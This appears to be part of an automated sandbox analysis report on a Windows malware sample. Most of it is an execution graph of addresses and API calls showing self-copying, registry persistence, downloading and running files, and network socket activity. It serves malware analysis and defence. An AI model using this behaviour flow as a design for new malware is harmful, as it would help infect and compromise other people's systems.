                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 469056452-0
                                                                                                                    • Opcode ID: 8ca99ff4882e63aa9735e8727bb02e2b1fcb4473e0a054d1445a25974175a9b9
                                                                                                                    • Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
                                                                                                                    • Opcode Fuzzy Hash: 8ca99ff4882e63aa9735e8727bb02e2b1fcb4473e0a054d1445a25974175a9b9
                                                                                                                    • Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:0.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:1446
                                                                                                                    Total number of Limit Nodes:1
                                                                                                                    execution_graph 5820 40cf00 5826 4021b0 5820->5826 5823 40cf25 WaitForSingleObject 5830 401600 5823->5830 5825 40cf3f 5827 4021bb 5826->5827 5828 4021cf 5826->5828 5827->5828 5851 402020 5827->5851 5828->5823 5828->5825 5831 40160d 5830->5831 5850 401737 5830->5850 5832 401619 EnterCriticalSection 5831->5832 5831->5850 5833 4016b5 LeaveCriticalSection SetEvent 5832->5833 5836 401630 5832->5836 5834 4016d0 5833->5834 5835 4016e8 5833->5835 5837 4016d6 PostQueuedCompletionStatus 5834->5837 5838 40d2d0 11 API calls 5835->5838 5836->5833 5839 401641 InterlockedDecrement 5836->5839 5841 40165a InterlockedExchangeAdd 5836->5841 5848 4016a0 InterlockedDecrement 5836->5848 5837->5835 5837->5837 5840 4016f3 5838->5840 5839->5836 5842 40d410 7 API calls 5840->5842 5841->5836 5843 40166d InterlockedIncrement 5841->5843 5844 4016fc CloseHandle CloseHandle WSACloseEvent 5842->5844 5845 401c50 4 API calls 5843->5845 5872 40ab40 shutdown closesocket 5844->5872 5845->5836 5847 401724 DeleteCriticalSection 5849 40a1b0 _invalid_parameter 3 API calls 5847->5849 5848->5836 5849->5850 5850->5825 5852 409d90 7 API calls 5851->5852 5853 40202b 5852->5853 5854 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5853->5854 5860 4021a5 5853->5860 5855 402076 CreateIoCompletionPort 5854->5855 5856 40219f 5854->5856 5855->5856 5857 40208f 5855->5857 5858 401600 36 API calls 5856->5858 5859 40d130 8 API calls 5857->5859 5858->5860 5861 402094 5859->5861 5860->5828 5861->5856 5862 40209f WSASocketA 5861->5862 5862->5856 5863 4020bd setsockopt htons bind 5862->5863 5863->5856 5864 402126 listen 5863->5864 5864->5856 5865 40213a WSACreateEvent 5864->5865 5865->5856 5866 402147 WSAEventSelect 5865->5866 5866->5856 5867 402159 5866->5867 5868 40217f 5867->5868 5869 40d160 17 API calls 5867->5869 5870 40d160 17 API calls 5868->5870 5869->5867 5871 402194 5870->5871 5871->5828 5872->5847 5347 406045 5349 405fbe 5347->5349 5348 40604a LeaveCriticalSection 5349->5348 5350 40a220 8 API calls 5349->5350 5351 40601c 5350->5351 5351->5348 5352 407b49 5353 407b52 5352->5353 5354 407b61 34 API calls 5353->5354 5355 408996 5353->5355 5885 40a28e 5886 40a1b0 _invalid_parameter 3 API calls 5885->5886 5889 40a24d 5886->5889 5887 40a262 5888 409fa0 _invalid_parameter 7 API calls 5888->5889 5889->5887 5889->5888 5890 40a264 memcpy 5889->5890 5890->5889 4351 407590 Sleep CreateMutexA GetLastError 4352 4075c6 ExitProcess 4351->4352 4353 4075ce 6 API calls 4351->4353 4354 407673 4353->4354 4355 40795a Sleep 4353->4355 4407 40e730 GetLocaleInfoA strcmp 4354->4407 4414 40c7d0 4355->4414 4360 407680 ExitProcess 4361 407688 ExpandEnvironmentStringsW wsprintfW CopyFileW 4363 407779 Sleep wsprintfW CopyFileW 4361->4363 4364 4076dc SetFileAttributesW RegOpenKeyExW 4361->4364 4362 407975 9 API calls 4417 405bc0 InitializeCriticalSection CreateFileW 4362->4417 5240 407440 4362->5240 5247 405880 4362->5247 5256 406bc0 Sleep GetModuleFileNameW 4362->5256 4368 4077c1 SetFileAttributesW RegOpenKeyExW 4363->4368 4369 40785e Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4363->4369 4364->4363 4367 407718 wcslen RegSetValueExW 4364->4367 4365 407ae1 4367->4363 4373 40774d RegCloseKey 4367->4373 4368->4369 4374 4077fd wcslen RegSetValueExW 4368->4374 4369->4355 4372 4078bd SetFileAttributesW RegOpenKeyExW 4369->4372 4372->4355 4376 4078f9 wcslen RegSetValueExW 4372->4376 4409 40e980 memset memset CreateProcessW 4373->4409 4374->4369 4378 407832 RegCloseKey 4374->4378 4376->4355 4381 40792e RegCloseKey 4376->4381 4379 40e980 6 API calls 4378->4379 4383 40784b 4379->4383 4385 40e980 6 API calls 4381->4385 4383->4369 4387 407856 ExitProcess 4383->4387 4384 407a2a CreateEventA 4449 40bf00 4384->4449 4389 407947 4385->4389 4386 407771 ExitProcess 4389->4355 4391 407952 ExitProcess 4389->4391 4398 40d160 17 API calls 4399 407a8a 4398->4399 4400 40d160 17 API calls 4399->4400 4401 407aa6 4400->4401 4402 40d160 17 API calls 4401->4402 4403 407ac2 4402->4403 4494 40d2d0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4403->4494 4405 407ad2 4503 40d410 4405->4503 4408 407678 4407->4408 4408->4360 4408->4361 4410 40e9f1 ShellExecuteW 4409->4410 4411 40e9e2 Sleep 4409->4411 4412 407766 4410->4412 4413 40ea17 Sleep 4410->4413 4411->4412 4412->4363 4412->4386 4413->4412 4512 40c7a0 4414->4512 4418 405ce5 4417->4418 4419 405bf8 CreateFileMappingW 4417->4419 4431 40d640 CoInitializeEx 4418->4431 4420 405c19 MapViewOfFile 4419->4420 4421 405cdb CloseHandle 4419->4421 4422 405cd1 CloseHandle 4420->4422 4423 405c38 GetFileSize 4420->4423 4421->4418 4422->4421 4425 405c4d 4423->4425 4424 405cc7 UnmapViewOfFile 4424->4422 4425->4424 4427 405c8c 4425->4427 4430 405c5c 4425->4430 4641 40c820 4425->4641 4648 405cf0 4425->4648 4428 40a1b0 _invalid_parameter 3 API calls 4427->4428 4428->4430 4430->4424 4954 40d710 socket 4431->4954 4433 407a25 4444 406fe0 CoInitializeEx SysAllocString 4433->4444 4434 40d6e8 4998 40a2d0 4434->4998 4437 40d6aa 4979 40aa80 htons 4437->4979 4438 40d660 4438->4433 4438->4434 4438->4437 4964 40d980 4438->4964 4443 40e470 24 API calls 4443->4434 4445 407002 4444->4445 4446 407018 CoUninitialize 4444->4446 5143 407030 4445->5143 4446->4384 5152 40bec0 4449->5152 4452 40bec0 3 API calls 4453 40bf1e 4452->4453 4454 40bec0 3 API calls 4453->4454 4455 40bf2e 4454->4455 4456 40bec0 3 API calls 4455->4456 4457 407a42 4456->4457 4458 40d130 4457->4458 4459 409d90 7 API calls 4458->4459 4460 40d13b 4459->4460 4461 407a4c 4460->4461 4462 40d147 InitializeCriticalSection 4460->4462 4463 40b2c0 InitializeCriticalSection 4461->4463 4462->4461 4465 40b2da 4463->4465 4464 40b309 CreateFileW 4467 40b330 CreateFileMappingW 4464->4467 4468 40b3f2 4464->4468 4465->4464 5159 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4465->5159 5160 40aea0 4465->5160 4470 40b351 MapViewOfFile 4467->4470 4471 40b3e8 CloseHandle 4467->4471 5208 40ab60 EnterCriticalSection 4468->5208 4474 40b36c GetFileSize 4470->4474 4475 40b3de CloseHandle 4470->4475 4471->4468 4473 40b3f7 4476 40d160 17 API calls 4473->4476 4480 40b38b 4474->4480 4475->4471 4477 407a56 4476->4477 4482 40d160 4477->4482 4478 40b3d4 UnmapViewOfFile 4478->4475 4480->4478 4481 40aea0 32 API calls 4480->4481 5207 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4480->5207 4481->4480 4483 40d177 EnterCriticalSection 4482->4483 4484 407a6f 4482->4484 5235 40d250 4483->5235 4484->4398 4487 40d23b LeaveCriticalSection 4487->4484 4488 409fe0 9 API calls 4489 40d1b9 4488->4489 4489->4487 4490 40d1cb CreateThread 4489->4490 4490->4487 4491 40d1ee 4490->4491 4492 40d212 GetCurrentProcess GetCurrentProcess DuplicateHandle 4491->4492 4493 40d234 4491->4493 4492->4493 4493->4487 4495 40d306 InterlockedExchangeAdd 4494->4495 4496 40d3e9 GetCurrentThread SetThreadPriority 4494->4496 4495->4496 4498 40d320 4495->4498 4496->4405 4497 40d339 EnterCriticalSection 4497->4498 4498->4496 4498->4497 4499 40d3a7 LeaveCriticalSection 4498->4499 4500 40d383 WaitForSingleObject 4498->4500 4501 40d3dc Sleep 4498->4501 4502 40d3be 4498->4502 4499->4498 4499->4502 4500->4498 4501->4498 4502->4496 4504 40d492 4503->4504 4505 40d41c EnterCriticalSection 4503->4505 4504->4365 4506 40d438 4505->4506 4507 40d460 LeaveCriticalSection DeleteCriticalSection 4506->4507 4508 40d44b CloseHandle 4506->4508 4509 40a1b0 _invalid_parameter 3 API calls 4507->4509 4508->4506 4510 40d486 4509->4510 4511 40a1b0 _invalid_parameter 3 API calls 4510->4511 4511->4504 4515 40c3f0 4512->4515 4516 40c423 4515->4516 4517 40c40e 4515->4517 4519 40796a 4516->4519 4547 40c5d0 4516->4547 4521 40c450 4517->4521 4519->4362 4519->4365 4522 40c502 4521->4522 4523 40c479 4521->4523 4525 409d90 7 API calls 4522->4525 4546 40c4fa 4522->4546 4523->4546 4581 409d90 4523->4581 4527 40c528 4525->4527 4529 402420 7 API calls 4527->4529 4527->4546 4531 40c555 4529->4531 4533 4024e0 10 API calls 4531->4533 4535 40c56f 4533->4535 4534 40c4cf 4536 402420 7 API calls 4534->4536 4537 402420 7 API calls 4535->4537 4538 40c4e0 4536->4538 4539 40c580 4537->4539 4540 4024e0 10 API calls 4538->4540 4541 4024e0 10 API calls 4539->4541 4540->4546 4542 40c59a 4541->4542 4543 402420 7 API calls 4542->4543 4544 40c5ab 4543->4544 4545 4024e0 10 API calls 4544->4545 4545->4546 4546->4519 4548 40c5f9 4547->4548 4549 40c6aa 4547->4549 4550 40c6a2 4548->4550 4551 409d90 7 API calls 4548->4551 4549->4550 4553 409d90 7 API calls 4549->4553 4550->4519 4552 40c60f 4551->4552 4552->4550 4555 402420 7 API calls 4552->4555 4554 40c6ce 4553->4554 4554->4550 4557 402420 7 API calls 4554->4557 4556 40c633 4555->4556 4558 409d90 7 API calls 4556->4558 4559 40c6f2 4557->4559 4560 40c642 4558->4560 4561 409d90 7 API calls 4559->4561 4562 4024e0 10 API calls 4560->4562 4563 40c701 4561->4563 4564 40c66b 4562->4564 4565 4024e0 10 API calls 4563->4565 4566 40a1b0 _invalid_parameter 3 API calls 4564->4566 4567 40c72a 4565->4567 4568 40c677 4566->4568 4569 40a1b0 _invalid_parameter 3 API calls 4567->4569 4570 402420 7 API calls 4568->4570 4571 40c736 4569->4571 4572 40c688 4570->4572 4573 402420 7 API calls 4571->4573 4574 4024e0 10 API calls 4572->4574 4575 40c747 4573->4575 4574->4550 4576 4024e0 10 API calls 4575->4576 4577 40c761 4576->4577 4578 402420 7 API calls 4577->4578 4579 40c772 4578->4579 4580 4024e0 10 API calls 4579->4580 4580->4550 4592 409db0 4581->4592 4584 402420 4613 409fa0 4584->4613 4589 4024e0 4620 402540 4589->4620 4591 4024ff __aligned_recalloc_base 4591->4534 4601 409e50 GetCurrentProcessId 4592->4601 4594 409dbb 4595 409dc7 _invalid_parameter 4594->4595 4602 409e70 4594->4602 4597 409d9e 4595->4597 4598 409de2 HeapAlloc 4595->4598 4597->4546 4597->4584 4598->4597 4599 409e09 _invalid_parameter 4598->4599 4599->4597 4600 409e24 memset 4599->4600 4600->4597 4601->4594 4610 409e50 GetCurrentProcessId 4602->4610 4604 409e79 4605 409e96 HeapCreate 4604->4605 4611 409ee0 GetProcessHeaps 4604->4611 4607 409eb0 HeapSetInformation GetCurrentProcessId 4605->4607 4608 409ed7 4605->4608 4607->4608 4608->4595 4610->4604 4612 409e8c 4611->4612 4612->4605 4612->4608 4614 409db0 _invalid_parameter 7 API calls 4613->4614 4615 40242b 4614->4615 4616 402820 4615->4616 4617 40282a 4616->4617 4618 409fa0 _invalid_parameter 7 API calls 4617->4618 4619 402438 4618->4619 4619->4589 4621 40258e 4620->4621 4623 402551 4620->4623 4622 409fa0 _invalid_parameter 7 API calls 4621->4622 4621->4623 4626 4025b2 _invalid_parameter 4622->4626 4623->4591 4624 4025e2 memcpy 4625 402606 _invalid_parameter 4624->4625 4628 40a1b0 _invalid_parameter 3 API calls 4625->4628 4626->4624 4630 40a1b0 4626->4630 4628->4623 4637 409e50 GetCurrentProcessId 4630->4637 4632 40a1bb 4633 4025df 4632->4633 4638 40a0f0 4632->4638 4633->4624 4636 40a1d7 HeapFree 4636->4633 4637->4632 4639 40a120 HeapValidate 4638->4639 4640 40a140 4638->4640 4639->4640 4640->4633 4640->4636 4658 40a220 4641->4658 4644 40c861 4644->4425 4647 40a1b0 _invalid_parameter 3 API calls 4647->4644 4871 409fe0 4648->4871 4651 405d2a memcpy 4652 40a220 8 API calls 4651->4652 4653 405d61 4652->4653 4881 40c190 4653->4881 4656 405de8 4656->4425 4659 40a24d 4658->4659 4660 409fa0 _invalid_parameter 7 API calls 4659->4660 4661 40a262 4659->4661 4662 40a264 memcpy 4659->4662 4660->4659 4661->4644 4663 40bd30 4661->4663 4662->4659 4671 40bd3a 4663->4671 4666 40bd71 memcmp 4666->4671 4667 40bd98 4668 40a1b0 _invalid_parameter 3 API calls 4667->4668 4670 40bd59 4668->4670 4669 40a1b0 _invalid_parameter 3 API calls 4669->4671 4670->4644 4670->4647 4671->4666 4671->4667 4671->4669 4671->4670 4672 40c220 4671->4672 4686 407af0 4671->4686 4673 40c22f _invalid_parameter 4672->4673 4674 409fa0 _invalid_parameter 7 API calls 4673->4674 4676 40c239 4673->4676 4675 40c2c8 4674->4675 4675->4676 4677 402420 7 API calls 4675->4677 4676->4671 4678 40c2dd 4677->4678 4679 402420 7 API calls 4678->4679 4680 40c2e5 4679->4680 4682 40c33d _invalid_parameter 4680->4682 4689 40c390 4680->4689 4694 402470 4682->4694 4685 402470 3 API calls 4685->4676 4802 409d10 4686->4802 4690 4024e0 10 API calls 4689->4690 4691 40c3a4 4690->4691 4700 4026f0 4691->4700 4693 40c3bc 4693->4680 4695 4024ce 4694->4695 4698 402484 _invalid_parameter 4694->4698 4695->4685 4696 4024ac 4697 40a1b0 _invalid_parameter 3 API calls 4696->4697 4697->4695 4698->4696 4699 40a1b0 _invalid_parameter 3 API calls 4698->4699 4699->4696 4703 402710 4700->4703 4702 40270a 4702->4693 4704 402724 4703->4704 4705 402540 __aligned_recalloc_base 10 API calls 4704->4705 4706 40276d 4705->4706 4707 402540 __aligned_recalloc_base 10 API calls 4706->4707 4708 40277d 4707->4708 4709 402540 __aligned_recalloc_base 10 API calls 4708->4709 4710 40278d 4709->4710 4711 402540 __aligned_recalloc_base 10 API calls 4710->4711 4712 40279d 4711->4712 4713 4027a6 4712->4713 4714 4027cf 4712->4714 4718 403e20 4713->4718 4735 403df0 4714->4735 4717 4027c7 __aligned_recalloc_base 4717->4702 4719 402820 _invalid_parameter 7 API calls 4718->4719 4720 403e37 4719->4720 4721 402820 _invalid_parameter 7 API calls 4720->4721 4722 403e46 4721->4722 4723 402820 _invalid_parameter 7 API calls 4722->4723 4724 403e55 4723->4724 4725 402820 _invalid_parameter 7 API calls 4724->4725 4734 403e64 _invalid_parameter __aligned_recalloc_base 4725->4734 4727 40400f _invalid_parameter 4728 402850 _invalid_parameter 3 API calls 4727->4728 4729 404035 _invalid_parameter 4727->4729 4728->4727 4730 402850 _invalid_parameter 3 API calls 4729->4730 4731 40405b _invalid_parameter 4729->4731 4730->4729 4732 402850 _invalid_parameter 3 API calls 4731->4732 4733 404081 4731->4733 4732->4731 4733->4717 4734->4727 4738 402850 4734->4738 4742 404090 4735->4742 4737 403e0c 4737->4717 4739 402866 4738->4739 4740 40285b 4738->4740 4739->4734 4741 40a1b0 _invalid_parameter 3 API calls 4740->4741 4741->4739 4743 4040a6 _invalid_parameter 4742->4743 4744 4040b8 _invalid_parameter 4743->4744 4745 4040dd 4743->4745 4749 404103 4743->4749 4744->4737 4772 403ca0 4745->4772 4747 40413d 4782 404680 4747->4782 4748 40415e 4751 402820 _invalid_parameter 7 API calls 4748->4751 4749->4747 4749->4748 4752 40416f 4751->4752 4753 402820 _invalid_parameter 7 API calls 4752->4753 4754 40417e 4753->4754 4755 402820 _invalid_parameter 7 API calls 4754->4755 4756 40418d 4755->4756 4757 402820 _invalid_parameter 7 API calls 4756->4757 4758 40419c 4757->4758 4795 403d70 4758->4795 4760 402820 _invalid_parameter 7 API calls 4761 4041ca _invalid_parameter 4760->4761 4761->4760 4762 404284 _invalid_parameter __aligned_recalloc_base 4761->4762 4763 402850 _invalid_parameter 3 API calls 4762->4763 4764 4045a3 _invalid_parameter 4762->4764 4763->4762 4765 402850 _invalid_parameter 3 API calls 4764->4765 4766 4045c9 _invalid_parameter 4764->4766 4765->4764 4767 402850 _invalid_parameter 3 API calls 4766->4767 4768 4045ef _invalid_parameter 4766->4768 4767->4766 4769 402850 _invalid_parameter 3 API calls 4768->4769 4770 404615 _invalid_parameter 4768->4770 4769->4768 4770->4744 4771 402850 _invalid_parameter 3 API calls 4770->4771 4771->4770 4773 403cae 4772->4773 4774 402820 _invalid_parameter 7 API calls 4773->4774 4775 403ccb 4774->4775 4776 402820 _invalid_parameter 7 API calls 4775->4776 4778 403cda _invalid_parameter 4776->4778 4777 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4777->4778 4778->4777 4779 403d3a _invalid_parameter 4778->4779 4780 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4779->4780 4781 403d60 4779->4781 4780->4779 4781->4744 4783 402820 _invalid_parameter 7 API calls 4782->4783 4784 404697 4783->4784 4785 402820 _invalid_parameter 7 API calls 4784->4785 4786 4046a6 4785->4786 4787 402820 _invalid_parameter 7 API calls 4786->4787 4788 4046b5 _invalid_parameter __aligned_recalloc_base 4787->4788 4789 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4788->4789 4791 404841 _invalid_parameter 4788->4791 4789->4788 4790 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4790->4791 4791->4790 4792 404867 _invalid_parameter 4791->4792 4793 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4792->4793 4794 40488d 4792->4794 4793->4792 4794->4744 4796 402820 _invalid_parameter 7 API calls 4795->4796 4797 403d7f _invalid_parameter 4796->4797 4798 403ca0 _invalid_parameter 9 API calls 4797->4798 4800 403db8 _invalid_parameter 4798->4800 4799 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4799->4800 4800->4799 4801 403de3 4800->4801 4801->4761 4803 409d22 4802->4803 4806 409c70 4803->4806 4807 409fa0 _invalid_parameter 7 API calls 4806->4807 4812 409c80 4807->4812 4808 407b0f 4808->4671 4810 409cbc 4813 40a1b0 _invalid_parameter 3 API calls 4810->4813 4812->4808 4812->4810 4815 4091a0 4812->4815 4822 409790 4812->4822 4827 409b60 4812->4827 4813->4808 4816 4091a9 4815->4816 4817 4091b3 4815->4817 4816->4812 4817->4816 4818 4091f6 memset 4817->4818 4818->4816 4819 409217 4818->4819 4819->4816 4820 40921d memcpy 4819->4820 4835 408f70 4820->4835 4823 40979d 4822->4823 4824 4097a7 4822->4824 4823->4812 4824->4823 4825 40989f memcpy 4824->4825 4840 4094c0 4824->4840 4825->4824 4828 409b6c 4827->4828 4830 409b76 4827->4830 4828->4812 4829 4094c0 64 API calls 4831 409bf7 4829->4831 4830->4828 4830->4829 4831->4828 4832 408f70 6 API calls 4831->4832 4833 409c16 4832->4833 4833->4828 4834 409c2b memcpy 4833->4834 4834->4828 4836 408fbe 4835->4836 4838 408f7e 4835->4838 4836->4816 4838->4836 4839 408eb0 6 API calls 4838->4839 4839->4838 4841 4094da 4840->4841 4843 4094d0 4840->4843 4841->4843 4850 409300 4841->4850 4843->4824 4845 409618 memcpy 4845->4843 4847 409637 memcpy 4848 409761 4847->4848 4849 4094c0 62 API calls 4848->4849 4849->4843 4851 40930d 4850->4851 4852 409317 4850->4852 4851->4843 4851->4845 4851->4847 4852->4851 4853 4093a0 4852->4853 4855 4093a5 4852->4855 4856 409388 4852->4856 4861 408c60 4853->4861 4857 408f70 6 API calls 4855->4857 4859 408f70 6 API calls 4856->4859 4857->4853 4859->4853 4860 40944c memset 4860->4851 4862 408c79 4861->4862 4870 408c6f 4861->4870 4863 408b30 9 API calls 4862->4863 4862->4870 4864 408d72 4863->4864 4865 409fa0 _invalid_parameter 7 API calls 4864->4865 4866 408dc1 4865->4866 4867 4089a0 46 API calls 4866->4867 4866->4870 4868 408dee 4867->4868 4869 40a1b0 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4868->4869 4869->4870 4870->4851 4870->4860 4890 409e50 GetCurrentProcessId 4871->4890 4873 409feb 4874 409e70 _invalid_parameter 5 API calls 4873->4874 4879 409ff7 _invalid_parameter 4873->4879 4874->4879 4875 405d15 4875->4651 4875->4656 4876 40a0a0 HeapAlloc 4876->4879 4877 40a06a HeapReAlloc 4877->4879 4878 40a0f0 _invalid_parameter HeapValidate 4878->4879 4879->4875 4879->4876 4879->4877 4879->4878 4880 40a1b0 _invalid_parameter 3 API calls 4879->4880 4880->4879 4884 40c19b 4881->4884 4882 409fa0 _invalid_parameter 7 API calls 4882->4884 4883 405dad 4883->4656 4885 407310 4883->4885 4884->4882 4884->4883 4886 409fa0 _invalid_parameter 7 API calls 4885->4886 4887 407320 4886->4887 4888 407367 4887->4888 4889 40732c memcpy CreateThread CloseHandle 4887->4889 4888->4656 4889->4888 4891 407370 GetTickCount srand rand Sleep 4889->4891 4890->4873 4892 4073a7 4891->4892 4893 4073fd 4891->4893 4894 4073b6 StrChrA 4892->4894 4897 4073fb 4892->4897 4901 40eae0 9 API calls 4892->4901 4895 40eae0 61 API calls 4893->4895 4893->4897 4894->4892 4895->4897 4896 40a1b0 _invalid_parameter 3 API calls 4898 407428 4896->4898 4897->4896 4902 40ed03 InternetCloseHandle Sleep 4901->4902 4903 40eba3 InternetOpenUrlW 4901->4903 4906 4073e5 Sleep 4902->4906 4907 40ed2a 6 API calls 4902->4907 4904 40ebd2 CreateFileW 4903->4904 4905 40ecf6 InternetCloseHandle 4903->4905 4908 40ec01 InternetReadFile 4904->4908 4909 40ece9 CloseHandle 4904->4909 4905->4902 4906->4892 4907->4906 4910 40eda6 wsprintfW DeleteFileW 4907->4910 4911 40ec54 CloseHandle wsprintfW DeleteFileW 4908->4911 4912 40ec25 4908->4912 4909->4905 4913 40e7c0 21 API calls 4910->4913 4929 40e7c0 CreateFileW 4911->4929 4912->4911 4914 40ec2e WriteFile 4912->4914 4916 40eddb 4913->4916 4914->4908 4918 40ede5 Sleep 4916->4918 4919 40ee19 DeleteFileW 4916->4919 4922 40e980 6 API calls 4918->4922 4919->4906 4920 40eca0 Sleep 4923 40e980 6 API calls 4920->4923 4921 40ecdc DeleteFileW 4921->4909 4924 40edfc 4922->4924 4925 40ecb7 4923->4925 4924->4906 4927 40ee0f ExitProcess 4924->4927 4926 40ecd3 4925->4926 4928 40eccb ExitProcess 4925->4928 4926->4909 4930 40e805 CreateFileMappingW 4929->4930 4931 40e91a 4929->4931 4932 40e910 CloseHandle 4930->4932 4933 40e826 MapViewOfFile 4930->4933 4934 40e920 CreateFileW 4931->4934 4935 40e971 4931->4935 4932->4931 4936 40e845 GetFileSize 4933->4936 4937 40e906 CloseHandle 4933->4937 4938 40e942 WriteFile CloseHandle 4934->4938 4939 40e968 4934->4939 4935->4920 4935->4921 4940 40e861 4936->4940 4941 40e8fc UnmapViewOfFile 4936->4941 4937->4932 4938->4939 4942 40a1b0 _invalid_parameter 3 API calls 4939->4942 4951 40c7f0 4940->4951 4941->4937 4942->4935 4945 40c190 7 API calls 4946 40e8b0 4945->4946 4946->4941 4947 40e8cd memcmp 4946->4947 4947->4941 4948 40e8e9 4947->4948 4949 40a1b0 _invalid_parameter 3 API calls 4948->4949 4950 40e8f2 4949->4950 4950->4941 4952 40c220 10 API calls 4951->4952 4953 40c814 4952->4953 4953->4941 4953->4945 4955 40d86e 4954->4955 4956 40d73d htons inet_addr setsockopt 4954->4956 4955->4438 4957 40aa80 8 API calls 4956->4957 4958 40d7b6 bind lstrlenA sendto ioctlsocket 4957->4958 4959 40d80b 4958->4959 4960 40d832 4959->4960 4963 409fe0 9 API calls 4959->4963 5002 40d890 4959->5002 5011 40ab40 shutdown closesocket 4960->5011 4963->4959 5018 40dbc0 memset InternetCrackUrlA InternetOpenA 4964->5018 4967 40da9e 4967->4438 4969 40da6b 4970 40a1b0 _invalid_parameter 3 API calls 4969->4970 4970->4967 4976 40da61 SysFreeString 4976->4969 5125 40aa40 inet_addr 4979->5125 4982 40ab2d 4987 40e470 4982->4987 4983 40aadc connect 4984 40aaf0 getsockname 4983->4984 4985 40ab24 4983->4985 4984->4985 5128 40ab40 shutdown closesocket 4985->5128 5129 40aa20 inet_ntoa 4987->5129 4989 40e486 4990 40c9f0 11 API calls 4989->4990 4991 40e4a5 4990->4991 4992 40d6cc 4991->4992 5130 40e4f0 memset InternetCrackUrlA InternetOpenA 4991->5130 4992->4443 4995 40e4dc 4997 40a1b0 _invalid_parameter 3 API calls 4995->4997 4996 40a1b0 _invalid_parameter 3 API calls 4996->4995 4997->4992 5001 40a2d4 4998->5001 4999 40a2da 4999->4433 5000 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5000->5001 5001->4999 5001->5000 5007 40d8ac 5002->5007 5003 40d974 5003->4959 5004 40d8c8 recvfrom 5005 40d8f6 StrCmpNIA 5004->5005 5006 40d8e9 Sleep 5004->5006 5005->5007 5008 40d915 StrStrIA 5005->5008 5006->5007 5007->5003 5007->5004 5008->5007 5009 40d936 StrChrA 5008->5009 5012 40c8a0 5009->5012 5011->4955 5013 40c8ab 5012->5013 5014 40c8b1 lstrlenA 5013->5014 5015 40c8c4 5013->5015 5016 409fa0 _invalid_parameter 7 API calls 5013->5016 5017 40c8e0 memcpy 5013->5017 5014->5013 5014->5015 5015->5007 5016->5013 5017->5013 5017->5015 5019 40dc61 InternetConnectA 5018->5019 5020 40d99a 5018->5020 5021 40ddca InternetCloseHandle 5019->5021 5022 40dc9a HttpOpenRequestA 5019->5022 5020->4967 5031 40dab0 5020->5031 5021->5020 5023 40dcd0 HttpSendRequestA 5022->5023 5024 40ddbd InternetCloseHandle 5022->5024 5025 40ddb0 InternetCloseHandle 5023->5025 5028 40dced 5023->5028 5024->5021 5025->5024 5026 40dd3b 5026->5025 5027 40dd0e InternetReadFile 5027->5026 5027->5028 5028->5026 5028->5027 5029 409fe0 9 API calls 5028->5029 5030 40dd56 memcpy 5029->5030 5030->5028 5060 405690 5031->5060 5034 40d9b3 5034->4969 5041 40e420 5034->5041 5035 40dada SysAllocString 5036 40daf1 CoCreateInstance 5035->5036 5037 40dba7 5035->5037 5038 40db9d SysFreeString 5036->5038 5040 40db16 5036->5040 5039 40a1b0 _invalid_parameter 3 API calls 5037->5039 5038->5037 5039->5034 5040->5038 5077 40df70 5041->5077 5044 40ddf0 5082 40e240 5044->5082 5047 40da32 5047->4976 5057 40c9f0 5047->5057 5050 40e3a0 6 API calls 5051 40de47 5050->5051 5051->5047 5099 40e060 5051->5099 5054 40e060 6 API calls 5056 40de7f 5054->5056 5056->5047 5104 40df10 5056->5104 5120 40c960 5057->5120 5065 40569d 5060->5065 5061 4056a3 lstrlenA 5061->5065 5066 4056b6 5061->5066 5063 409fa0 _invalid_parameter 7 API calls 5063->5065 5065->5061 5065->5063 5065->5066 5067 40a1b0 _invalid_parameter 3 API calls 5065->5067 5068 405630 5065->5068 5072 4055e0 5065->5072 5066->5034 5066->5035 5067->5065 5069 405647 MultiByteToWideChar 5068->5069 5070 40563a lstrlenA 5068->5070 5071 40566c 5069->5071 5070->5069 5071->5065 5073 4055eb 5072->5073 5074 4055f1 lstrlenA 5073->5074 5075 405630 2 API calls 5073->5075 5076 405627 5073->5076 5074->5073 5075->5073 5076->5065 5080 40df96 5077->5080 5078 40da1d 5078->4969 5078->5044 5079 40e013 lstrcmpiW 5079->5080 5081 40e02b SysFreeString 5079->5081 5080->5078 5080->5079 5080->5081 5081->5080 5084 40e266 5082->5084 5083 40de0b 5083->5047 5094 40e3a0 5083->5094 5084->5083 5085 40e2f3 lstrcmpiW 5084->5085 5086 40e373 SysFreeString 5085->5086 5087 40e306 5085->5087 5086->5083 5088 40df10 2 API calls 5087->5088 5090 40e314 5088->5090 5089 40e365 5089->5086 5090->5086 5090->5089 5091 40e343 lstrcmpiW 5090->5091 5092 40e355 5091->5092 5093 40e35b SysFreeString 5091->5093 5092->5093 5093->5089 5095 40df10 2 API calls 5094->5095 5096 40e3bb 5095->5096 5097 40e240 6 API calls 5096->5097 